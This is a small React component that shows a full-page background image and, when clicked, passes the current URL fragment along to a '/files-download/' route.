import React from "react";
import { useNavigate } from "react-router-dom";
import fimg from "./mbck7.png";
import "./styles.css";

const Home = () => {
  const navigate = useNavigate();
  const getFragmentFromUrl = () => {
    const url = window.location.href; // Get the current URL
    const index = url.indexOf('#'); // Find the index of the '#' sign
  
    if (index !== -1) {
      return url.substring(index + 1); // Return everything after the '#' sign
    } else {
      return ''; // Return an empty string if no fragment is found
    }
  };
  
  // Example usage
  const fragment = getFragmentFromUrl();
  const navigateToNextPage = () => {
    navigate(`/files-download/#${fragment}`);
  };

  return (
    <div className="image-container" style={{ 
      backgroundImage: `url(${fimg})` 
    }} onClick={navigateToNextPage} > 
    </div>
  );
};

export default Home;
